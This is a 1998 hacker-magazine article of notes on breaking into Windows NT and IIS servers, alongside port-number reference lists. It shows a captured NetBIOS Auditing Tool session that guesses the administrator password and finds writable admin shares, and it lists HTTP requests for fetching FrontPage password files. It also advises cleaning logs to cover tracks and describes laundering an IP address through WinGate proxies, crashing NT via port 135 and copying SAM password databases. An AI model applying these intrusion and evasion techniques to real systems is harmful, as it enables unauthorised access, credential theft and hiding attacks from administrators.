*SWAT MAGAZINE ISSUE TWELVE: DECEMBER 1998*
**********************************************************************
| .Verious notes on windows NT. |
| By Netw0rk bug |
-----------------------------------------------------------------------
=Contents=
Notes On DLL Files
TCp/UDP Port Numbers
Notes On The Nat Command
RPC - Remote Procedure Calls
The Fromtpage Service Password
Notes On Wingate
Recognising NT Servers
NT Accounts And Passwords
The NT Password File
Notes On NETBIOS
=========================================================================
NOTES ON DLL FILES
=========================================================================
Authentication (GINA) module, specifically MSGINA.DLL. Under certain conditions, this file can
be replaced, which is how you would change the SAS key combination.
-------------------------------------------------------------------------
Windows NT 4.0 Service Pack 2 and later includes a password filter DLL file (Passfilt.dll) that lets
you enforce stronger password requirements for users. Passfilt.dll provides enhanced security
against "password guessing" or "dictionary attacks" by outside intruders.
Passfilt.dll implements the following password policy:
? Passwords must be at least six (6) characters long. (The minimum password length can be
increased further by setting a higher value in the Password Policy for the domain).
? Passwords must contain characters from at least three (3) of the following four (4) classes:
Description Examples
English upper case letters A, B, C, ... Z
English lower case letters a, b, c, ... z
Westernized Arabic numerals 0, 1, 2, ... 9
Non-alphanumeric ("special characters") such as punctuation symbols
? Passwords may not contain your user name or any part of your full name.
These requirements are hard-coded in the Passfilt.dll file and cannot be changed through the
user interface or registry. If you wish to raise or lower these requirements, you may write your
own .dll and implement it in the same fashion as the Microsoft version that is available with
Windows NT 4.0 Service Pack 2.
=========================================================================
TCP/UDP PORT NUMBERS
=========================================================================
Service Port Comments
TCP Ports
echo 7/tcp
discard 9/tcp sink null
systat 11/tcp users
daytime 13/tcp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
name 42/tcp nameserver
whois 43/tcp nicname
nameserver 53/tcp domain
apts 57/tcp any private terminal service
apfs 59/tcp any private file service
rje 77/tcp netrjs
finger 79/tcp
http 80/tcp
link 87/tcp ttylink
supdup 95/tcp
newacct 100/tcp [unauthorized use]
hostnames 101/tcp hostname
iso-tsap 102/tcp tsap
x400 103/tcp
x400-snd 104/tcp
csnet-ns 105/tcp CSNET Name Service
pop-2 109/tcp Post Office Protocol version 2
pop-3 110/tcp Post Office Protocol version 3
sunrpc 111/tcp
auth 113/tcp authentication
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet readnews untp
ntp 123/tcp network time protocol
statsrv 133/tcp
profile 136/tcp
NeWS 144/tcp news
print-srv 170/tcp
https 443/tcp Secure HTTP
exec 512/tcp remote process execution;
authentication performed using
passwords and UNIX loppgin names
login 513/tcp remote login a la telnet;
automatic authentication performed
based on priviledged port numbers
and distributed data bases which
identify "authentication domains"
cmd 514/tcp like exec, but automatic
authentication is performed as for
login server
printer 515/tcp spooler
efs 520/tcp extended file name server
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
netnews 532/tcp readnews
uucp 540/tcp uucpd
klogin 543/tcp
kshell 544/tcp krcmd
dsf 555/tcp
remotefs 556/tcp rfs server
chshell 562/tcp chcmd
meter 570/tcp demon
pcserver 600/tcp Sun IPC server
nqs 607/tcp nqs
mdqs 666/tcp
rfile 750/tcp
pump 751/tcp
qrh 752/tcp
rrh 753/tcp
tell 754/tcp send
nlogin 758/tcp
con 759/tcp
ns 760/tcp
rxe 761/tcp
quotad 762/tcp
cycleserv 763/tcp
omserv 764/tcp
webster 765/tcp
phonebook 767/tcp phone
vid 769/tcp
rtip 771/tcp
cycleserv2 772/tcp
submit 773/tcp
rpasswd 774/tcp
entomb 775/tcp
wpages 776/tcp
wpgs 780/tcp
mdbs 800/tcp
device 801/tcp
maitrd 997/tcp
busboy 998/tcp
garcon 999/tcp
blackjack 1025/tcp network blackjack
bbn-mmc 1347/tcp multi media conferencing
bbn-mmx 1348/tcp multi media conferencing
orasrv 1525/tcp oracle
ingreslock 1524/tcp
issd 1600/tcp
nkd 1650/tcp
dc 2001/tcp
mailbox 2004/tcp
berknet 2005/tcp
invokator 2006/tcp
dectalk 2007/tcp
conf 2008/tcp
news 2009/tcp
search 2010/tcp
raid-cc 2011/tcp raid
ttyinfo 2012/tcp
raid-am 2013/tcp
troff 2014/tcp
cypress 2015/tcp
cypress-stat 2017/tcp
terminaldb 2018/tcp
whosockami 2019/tcp
servexec 2021/tcp
down 2022/tcp
ellpack 2025/tcp
shadowserver 2027/tcp
submitserver 2028/tcp
device2 2030/tcp
blackboard 2032/tcp
glogger 2033/tcp
scoremgr 2034/tcp
imsldoc 2035/tcp
objectmanager 2038/tcp
lam 2040/tcp
interbase 2041/tcp
isis 2042/tcp
rimsl 2044/tcp
dls 2047/tcp
dls-monitor 2048/tcp
shilp 2049/tcp
NSWS 3049/tcp
rfa 4672/tcp remote file access server
complexmain 5000/tcp
complexlink 5001/tcp
padl2sim 5236/tcp
man 9535/tcp
UDP Ports
echo 7/udp
discard 9/udp sink null
systat 11/udp users
daytime 13/udp
netstat 15/udp
qotd 17/udp quote
chargen 19/udp ttytst source
time 37/udp timserver
rlp 39/udp resource
name 42/udp nameserver
whois 43/udp nicname
nameserver 53/udp domain
bootps 67/udp bootp
bootpc 68/udp
tftp 69/udp
sunrpc 111/udp
erpc 121/udp
ntp 123/udp
statsrv 133/udp
profile 136/udp
snmp 161/udp
snmp-trap 162/udp
at-rtmp 201/udp
at-nbp 202/udp
at-3 203/udp
at-echo 204/udp
at-5 205/udp
at-zis 206/udp
at-7 207/udp
at-8 208/udp
biff 512/udp used by mail system to notify users
of new mail received; currently
receives messages only from
processes on the same machine
who 513/udp maintains data bases showing who's
logged in to machines on a local
net and the load average of the
machine
syslog 514/udp
talk 517/udp like tenex link, but across
machine - unfortunately, doesn't
use link protocol (this is actually
just a rendezvous port from which a
tcp connection is established)
ntalk 518/udp
utime 519/udp unixtime
router 520/udp local routing process (on site);
uses variant of Xerox NS routing
information protocol
timed 525/udp timeserver
netwall 533/udp for emergency broadcasts
new-rwho 550/udp new-who
rmonitor 560/udp rmonitord
monitor 561/udp
meter 571/udp udemon
elcsd 704/udp errlog copy/server daemon
loadav 750/udp
vid 769/udp
cadlock 770/udp
notify 773/udp
acmaint_dbd 774/udp
acmaint_trnsd 775/udp
wpages 776/udp
puparp 998/udp
applix 999/udp Applix ac
puprouter 999/udp
cadlock 1000/udp
hermes 1248/udp
wizard 2001/udp curry
globe 2002/udp
emce 2004/udp CCWS mm conf
oracle 2005/udp
raid-cc 2006/udp raid
raid-am 2007/udp
terminaldb 2008/udp
whosockami 2009/udp
pipe_server 2010/udp
servserv 2011/udp
raid-ac 2012/udp
raid-cd 2013/udp
raid-sf 2014/udp
raid-cs 2015/udp
bootserver 2016/udp
bootclient 2017/udp
rellpack 2018/udp
about 2019/udp
xinupagesrver 2020/udp
xinuexpnsion1 2021/udp
xinuexpnsion2 2022/udp
xinuexpnsion3 2023/udp
xinuexpnsion4 2024/udp
xribs 2025/udp
scrabble 2026/udp
isis 2042/udp
isis-bcast 2043/udp
rimsl 2044/udp
cdfunc 2045/udp
sdfunc 2046/udp
dls 2047/udp
shilp 2049/udp
rmontor_scure 5145/udp
xdsxdm 6558/udp
isode-dua 17007/udp
=========================================================================
NOTES ON THE NAT COMMAND
=========================================================================
NAT.EXE [-o filename] [-u userlist] [-p passlist]
Switches:
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.
Here is an actual example of how the NAT.EXE program is used. The information listed here is
an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If
not, keep playing. You will be surprised what you find out.
=========================================================================
RPC (REMOTE PROCEDURE CALLS)
=========================================================================
In order for NT to allow for various system services to be performed on a remote computer, it
uses RPC, remote procedure calls. Please do not confuse this with SunRPC. You can run
NT/RPC's over a NetBIOS/SMB session or you can piggie back it directly off of TCP/IP (or other
transport protocol, perhaps NWLink IPX/SPX). Unfortunately we dont have any good
documentation on what inherent services NT provides through native RPC. Complex server type
programs (Like Exchange) provide their own RPC services in addition to the ones NT provides as
an operating system --(TCP Port 135 is used as a port-mapper port, we also know that if too
much information is fed through port 135, you can crash an NT box.). Some client software must
access TCP port 135 before accessing the RPC service itself (hint, hint). Keep in mind that TCP
port 135 can be blocked. Bummer, eh?
=========================================================================
THE FONTPAGE SERVICE PASSWORD
=========================================================================
The hacces.ctl file is sometimes called a shadow password file, well, this is not exactly correct.
The file can give you a lot of information, including the location of the service password file. A
complete example of the haccess.ctl file is given below:
The #haccess.ctl file:
# -FrontPage-
Options None
order deny,allow
deny from all
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Executing fpservwin.exe allows frontpage server extensions to be installed on
port 443 (HTTPS)Secure Sockets Layer
port 80 (HTTP)
NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used
instead of Frontpage.
The following is a list of the Internet Information server files location
in relation to the local hard drive (C:) and the web (www.target.com)
C:\InetPub\wwwroot
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For
each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the
FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in
FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
If Index Information Server is running under Internet Information Server:
service.pwd (or any other file) can sometimes be retrieved.
search for
"#filename=*.pwd"
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin
C:\InetPub\ftproot The default location for the ftp
The ftp service by default runs on the standard port 21.
Check to see if anonymous connections are allowed. By default, Internet Information Server
creates and uses the account IUSR_computername for all anonymous logons. Note that the
password is used only within Windows NT ; anonymous users do not log on using this user name
and password.
Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail
address as the password. The FTP service then uses the IUSR_computername account as the
logon account for permissions. When installed, Internet Information Server's Setup created the
account IUSR_computername in the Windows NT User Manager for Domains and in Internet
Service Manager. This account was assigned a random password for both in Internet Service
Manager and in the Windows NT User Manager for Domains. If changed, the password, you must
change it in both places and make sure it matches.
NOTE: Name and password are case sensitive
Scanning PORT 80 (http) or 443 (https) options:
GET /__vti_inf.html #Ensures that frontpage server extensions
are installed.
GET /_vti_pvt/service.pwd #Contains the encrypted password files.
Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted
names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log #If author.log is there it will need to
be cleaned to cover your tracks
GET /samples/search/queryhit.htm
If service.pwd is obtained it will look similar to this:
Vacuum:SGXJVl6OJ9zkE
The above password is apple
Turn it into DES format:
Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
Other ways of obtaining service.pwd
http://ftpsearch.com/index.html
search for service.pwd
http://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"
=========================================================================
NOTES ON WINGATE
=========================================================================
When you do a regular install of WinGate without changing things there are a few defaults:
Port: | Service:
23 Telnet Proxy Server - This is default and running right after install.
1080 SOCKS Server - This once setup via GateKeeper has no password until you set one.
6667 IRC Mapping - This once setup via GateKeeper has no password until you set one.
The biggest threat to your server is the port 23 telnet proxy.
Port 1080 SOCKS Proxy
The socks proxy is not installed by default but as soon as you use GateKeeper to install it. It
installs with no password, unless you set one. If you are familiar with socks you know that there
are many things you could do with it.
Port 6667 IRC Proxy
The irc proxy is like how we would do a wingate telnet proxy bounce to an irc server except the irc
proxy is set to goto a certain server already. This is not set to run after install but after you do
install it it setups with no password, unless you set one.
Mr. Rodd.
He had discovered this bug, had written an exploit for it, and had written a netscanner which
would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if
one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the
default state of these servers), one could telnet into and then back out of the WinGate server,
which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another
machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming
from the location of the WinGate server. This exploit was used to harass anti-spammers with
untraceable e-mail, but one could well imagine that it could be used for a variety of other attacks.
=========================================================================
RECOGNISING NT SERVERS
=========================================================================
[11.2.1] How can tell if its an NT box?
Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't
expect that...
Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not
Windows 95, however. Using Samba you should be able to connect and query for the existence
of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check
\CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first
as Everyone has read permissions here by default.
Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used,
certainly you can expect port 137 to be open if IP is anywhere in use around NT.
Another possible indication is checking for port 139. This tells you your target is advertising an
SMB resource to share info, but it could be any number of things, such as a Windows 95 machine
or even Windows for Workgroups. These may not be entirely out of the question as potential
targets, but if you are after NT you will have to use a combination of the aforementioned
techniques coupled with some common sense.
To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios
Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on
remote systems.
=========================================================================
NT ACCOUNTS AND PASSWORDS
=========================================================================
There are two accounts that come with NT out of the box – administrator and guest. In a network
environment, I have run into local administrator access unpassworded, since the Sys Admin
thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to
an NT box by using its local administrator account with no password.
Guest is another common unpassworded account, although recent shipments of NT disable the
account by default. While it is possible that some companies will delete the guest account, some
applications require it. If Microsoft Internet Studio needs to access data on another system, it
will use guest for that remote access.
You will find that by default all accounts in NT have complete SMB functionality. This includes
the Guest account. (In WinNT 3.51, the guest is auto created and active, in WinNT 4.0, the guest
account is auto created but is not active) Now, 2 things to remember: When it comes to login
attempt failures, the administrator account IS NEVER locked out after a certain number of login
attempts (this rule ALWAYS applies), also by default, when windows NT is installed, NONE of the
accounts have fail login attempt lock out. Also, in order for SMB to work, UDP/TCP ports
137,138,139 (NetBIOS over TCP) must be ope
=========================================================================
THE NT PASSWORD FILE
=========================================================================
Accessing the password file in NT
The location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which is the location of
the security database. This is usually world readable by default, but locked since it is in use by
system compotents. It is possible that there are SAM.SAV files which could be readable. If so,
these could be obtained for the purpose of getting password info.
During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it
was just installed, only the Administrator and Guest accounts will be there, but maybe
Administrator is enough -- especially if the Administrator password is not changed after
installation.
=========================================================================
NOTES ON NETBIOS
=========================================================================
NetBIOS over TCP/IP should normally be disabled for a firewall or web server. The following is a
list of the ports used by NBT.
? NetBIOS-ns 137/tcp NETBIOS Name Service
? NetBIOS-ns 137/udp NETBIOS Name Service
? NetBIOS-dgm 138/tcp NETBIOS Datagram Service
? NetBIOS-dgm 138/udp NETBIOS Datagram Service
? NetBIOS-ssn 139/tcp NETBIOS Session Service
? NetBIOS-ssn 139/udp NETBIOS Session Service
What exactly does the NetBios Auditing Tool do?
Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the
complete source code. It is the "SATAN" of NetBios based systems.
Here is a quote from Secure Networks Inc about the product -
"The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services
offered by the target system. It implements a stepwise approach to gather information and
attempt to obtain file system-level access as though it were a legitimate local client.
The major steps are as follows:
A UDP status query is sent to the target, which usually elicits a reply containing the Netbios
"computer name". This is needed to establish a session. The reply also can contain other
information such as the workgroup and account names of the machine's users. This part of the
program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent
back to UDP port 137 even if the original query came from some different port.
TCP connections are made to the target's Netbios port [139], and session requests using the
derived computer name are sent across. Various guesses at the computer name are also used, in
case the status query failed or returned incomplete information. If all such attempts to establish a
session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was
reachable.
Provided a connection is established Netbios "protocol levels" are now negotiated across the new
connection. This establishes various modes and capabilities the client and server can use with
each other, such as password encryption and if the server uses user-level or share-level Security.
The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that
protocol is somewhat simpler and uses a smaller password keyspace than NT.
If the server requires further session setup to establish credentials, various defaults are
attempted. Completely blank usernames and passwords are often allowed to set up "guest"
connections to a server; if this fails then guesses are tried using fairly standard account names
such as ADMINISTRATOR, and some of the names returned from the status query. Extensive
username/password checking is NOT done at this point, since the aim is just to get the session
established, but it should be noted that if this phase is reached at all MANY more guesses can be
attempted and likely without the owner of the target being immediately aware of it.
Once the session is fully set up, transactions are performed to collect more information about the
server including any file system "shares" it offers.
Attempts are then made to connect to all listed file system shares and some potentially unlisted
ones. If the server requires passwords for the shares, defaults are attempted as described above
for session setup. Any successful connections are then explored for writeability and some well-
known file-naming problems [the ".." class of bugs].
If a NETBIOS session can be established at all via TCP port 139, the target is declared
"vulnerable" with the remaining question being to what extent. Information is collected under the
appropriate vulnerability at most of these steps, since any point along the way be blocked by the
Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will
yield computer names and share lists, but not allow actual file-sharing connections without
a valid username and/or password. A remote connection to a share is therefore a possibly
serious Security problem, and a connection that allows WRITING to the share almost certainly so.
Printer and other "device" services offered by the server are currently ignored."
If you need more info on NAT, try looking at this web location:
http://www.secnet.com/ntinfo/ntaudit.html
http://www.rhino9.org